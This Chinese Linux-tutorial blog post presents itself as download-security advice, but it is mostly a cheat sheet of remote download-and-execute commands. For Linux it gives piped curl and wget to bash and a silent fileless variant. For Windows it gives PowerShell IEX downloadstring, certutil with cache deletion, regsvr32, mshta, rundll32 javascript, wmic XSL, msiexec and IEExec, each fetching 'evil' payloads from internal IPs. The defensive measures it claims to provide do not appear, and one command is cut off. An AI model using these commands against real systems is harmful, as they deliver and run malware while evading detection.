良许Linux教程网 干货合集 远离恶意代码,你需要了解的下载安全知识

远离恶意代码,你需要了解的下载安全知识

作者: 良许 468阅读 0评论

在当前互联网环境下,恶意代码已经成为了网络安全的一大难题。其中,通过下载方式传播的恶意代码更是层出不穷,给用户的计算机带来严重的威胁。本文将介绍恶意代码的下载方式与特征,帮助你有效地保护你的计算机安全。

一、Linux 远程恶意代码执行

01、curl

以用curl的方式执行http页面上的shell脚本,无需download,在本地机器上直接执行。

方式1:curl -fsSL http://192.168.99.19:8080/test.sh | bash 
方式2:bash 

02、wget

执行wget命令远程下载恶意程序。

方式1:wget -q -O- http://192.168.99.19:8080/test.sh | bash 
方式2:wget http://192.168.99.19:8080/shell.txt -O /tmp/x.php && php /tmp/x.php 

curl+wget合并,实现无文件远程恶意代码执行。

bash -c '(curl -fsSL http://192.168.99.19:8080/test.sh|| 
wget -q -O- http://192.168.99.19:8080/test.sh)|bash -sh >/dev/nul
l 2>&1&' 

03、rcp

rcp命令用于复制远程文件或目录。

rcp root@x.x.x.x:./testfile testfile 

04、scp

scp 是 rcp 的加强版,scp 是加密的,rcp 是不加密的。

scp username@servername:/path/filename /tmp/local_destination 

05、rsync

使用rsync可以进行远程同步,拉取文件到本地服务器。

rsync -av x.x.x.x:/tmp/passwd.txt  /tmp/passwd.txt 

06、sftp

使用sftp下载远程服务器上的文件。

sftp admin@192.168.99.242 

二、Windows 远程恶意代码执行

01、Powershell

利用powershell远程执行ps1脚本

powershell -nop -w hidden -c "IEX ((new-

object net.webclient).downloadstring('http://192.168.28.128/evil.txt'))" 

02、Bitsadmin

利用bitsadmin命令下载文件到目标机器。

bitsadmin /transfer n http://192.168.28.128/imag/evil.txt d:\test\1.txt 

03、certutil

用于备份证书服务,一般建议下载完文件后对缓存进行删除。

#下载文件 
certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt test.php 
#删除缓存 
certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt delete 

04、rundll32

使用rundll32.exe,可以通过mshtml.dll执行JavaScript ,依赖于WScript.shell这个组件

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveX
Object("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.28.131:8888/connect",false
);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} 

05、regsvr32

远程加载执行,解析.src文件。

regsvr32.exe /u /n /s /i:http://192.168.28.131:8888/file.sct scrobj.dll 

06、wmic

执行WMIC以下命令从远程服务器下载并运行恶意XSL文件:

wmic os get /FORMAT:"http://192.168.28.128/evil.xsl" 

07、msiexec

用于安装Windows Installer安装包,可远程执行msi文件。

msiexec /q /i http://192.168.28.128/evil.msi 

08、IEExec

IEexec.exe应用程序是.NET Framework附带程序,运行IEExec.exe并使用url启动其他程序。

crosoft.NET\Framework64\v2.0.50727>caspol.exe -s off 
C:\Windows\Microsoft.NET\Framework64\v2.0.50727>IEExec.exe http://192.168.28.131/evil.exe 

09、mshta

mshta用于执行.hta文件

mshta http://192.168.28.128/run.hta 

10、msxsl

msxsl.exe是微软用于命令行下处理XSL的一个程序

msxsl http://192.168.28.128/scripts/demo.xml http://192.168.28.128/scripts/exec.xsl 

11、pubprn.vbs

在Windows 7以上版本存在一个名为pubprn.vbs的微软已签名WSH脚本,可以利用来解析.sct脚本:

"C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs" 127.0.0.1 script:https:

在网络时代,我们无法避免不与外界连接。而恶意代码也因此有了可趁之机。因此,了解恶意代码存在的下载方式及特征,对于保护您的电脑安全至关重要。本文从多方面进行了阐述,并提供了相应的处理措施,相信能够帮助您更好地保护计算机安全,远离恶意代码。

以上就是良许教程网为各位朋友分享的Linu系统相关内容。想要了解更多Linux相关知识记得关注公众号“良许Linux”,或扫描下方二维码进行关注,更多干货等着你 !

137e00002230ad9f26e78-265x300
本文由 良许Linux教程网 发布,可自由转载、引用,但需署名作者且注明文章出处。如转载至微信公众号,请在文末添加作者公众号二维码。
打赏 4
标签:
良许

作者: 良许

良许,世界500强企业Linux开发工程师,公众号【良许Linux】的作者,全网拥有超30W粉丝。个人标签:创业者,CSDN学院讲师,副业达人,流量玩家,摄影爱好者。
上一篇
下一篇

相关推荐

发表评论

联系我们

联系我们

公众号:良许Linux

在线咨询: QQ交谈

邮箱: yychuyu@163.com

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部